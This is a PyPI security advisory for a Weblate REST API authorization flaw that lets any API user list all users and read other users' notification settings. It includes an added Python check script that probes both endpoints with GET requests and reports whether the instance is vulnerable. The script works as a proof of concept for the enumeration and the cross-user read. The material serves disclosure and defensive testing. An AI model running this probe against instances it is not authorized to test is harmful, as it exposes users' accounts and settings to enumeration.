Severity: MEDIUM (score 4.3) · Ecosystem: PyPI
Weblate has Systematic User and Project Enumeration via Broken Authorization in REST API (IDOR)
GHSA-3pmh-24wp-xpf4 · CVE-2025-67715 · PYSEC-2025-233
Description
Impact
Authorization checks on the REST API were missing (an IDOR / broken-authorization flaw), so an API user could retrieve the notification settings of other users and list all users, enabling systematic user enumeration.
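A read-only check for the two behaviours described above, added here as an example and not part of the Weblate project or this advisory. It assumes the documented Weblate REST API shape (token authentication via the `Authorization: Token <key>` header, a paginated user list at `/api/users/`, and per-user notification settings at `/api/users/<username>/notifications/`); verify those paths against your version's API documentation. The HTTP transport is injectable so the decision logic can be exercised against constructed responses without a live server. The enumeration criterion used here (the caller sees usernames other than its own) is this example's choice, not the advisory's.

```python
"""Added example, not Weblate project code: check a Weblate instance, using a
low-privileged API token you own, for cross-user access to notification
settings and for user enumeration through the REST API.

Assumptions (verify against your Weblate version's API docs):
  GET {base}/api/users/                          paginated user list
  GET {base}/api/users/<username>/notifications/  that user's notification settings
  Authentication header: "Authorization: Token <key>"
"""
import json
import sys
import urllib.error
import urllib.request
from typing import Any, Callable, Dict, Set, Tuple

# A transport takes (url, token) and returns (HTTP status, decoded JSON body or None).
# Injecting it keeps the checks testable offline with constructed responses.
Fetch = Callable[[str, str], Tuple[int, Any]]


def http_fetch(url: str, token: str) -> Tuple[int, Any]:
    """Real transport over urllib; 4xx/5xx responses are returned, not raised."""
    req = urllib.request.Request(
        url, headers={"Authorization": f"Token {token}", "Accept": "application/json"}
    )
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            raw = resp.read()
            return resp.status, (json.loads(raw) if raw else None)
    except urllib.error.HTTPError as err:
        return err.code, None


def _usernames(body: Any) -> Set[str]:
    """Collect usernames from a DRF-style paginated list ({"results": [...]}) or a bare list."""
    items = body.get("results", []) if isinstance(body, dict) else (body or [])
    return {i["username"] for i in items if isinstance(i, dict) and i.get("username")}


def check_user_enumeration(base: str, token: str, own_username: str,
                           fetch: Fetch = http_fetch) -> bool:
    """True if the caller can see usernames other than its own in /api/users/."""
    status, body = fetch(f"{base.rstrip('/')}/api/users/", token)
    if status != 200:
        return False
    return bool(_usernames(body) - {own_username})


def check_notification_idor(base: str, token: str, victim: str,
                            fetch: Fetch = http_fetch) -> bool:
    """True if the caller can read another user's notification settings.

    A patched instance is expected to answer 403 (or 404) for a user that is
    not the caller; a 200 with a body is the broken-authorization signal.
    """
    status, body = fetch(f"{base.rstrip('/')}/api/users/{victim}/notifications/", token)
    return status == 200 and body is not None


def audit(base: str, token: str, own_username: str, victim: str,
          fetch: Fetch = http_fetch) -> Dict[str, bool]:
    """Run both checks; True means the weakness was observed."""
    return {
        "user_enumeration": check_user_enumeration(base, token, own_username, fetch),
        "notification_idor": check_notification_idor(base, token, victim, fetch),
    }


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit("usage: weblate_idor_check.py BASE_URL TOKEN OWN_USERNAME OTHER_USERNAME")
    findings = audit(*sys.argv[1:5])
    for name, hit in findings.items():
        print(f"{name}: {'VULNERABLE' if hit else 'not observed'}")
    sys.exit(1 if any(findings.values()) else 0)
```

Run it with two ordinary (non-admin) accounts on an instance you are authorized to test: the token of the first and the username of the second. Only GET requests are issued; the exit status is 1 if either weakness is observed. A clean result does not prove the instance is patched, only that these two observable behaviours are absent for that account.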
Patches
Thanks to Hector Ruiz Ruiz & NaxusAI for responsibly disclosing this vulnerability to Weblate.
References
- WEB https://github.com/WeblateOrg/weblate/security/advisories/GHSA-3pmh-24wp-xpf4
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2025-67715
- WEB https://github.com/WeblateOrg/weblate/pull/17256
- PACKAGE https://github.com/WeblateOrg/weblate
- WEB https://github.com/pypa/advisory-database/tree/main/vulns/weblate/PYSEC-2025-233.yaml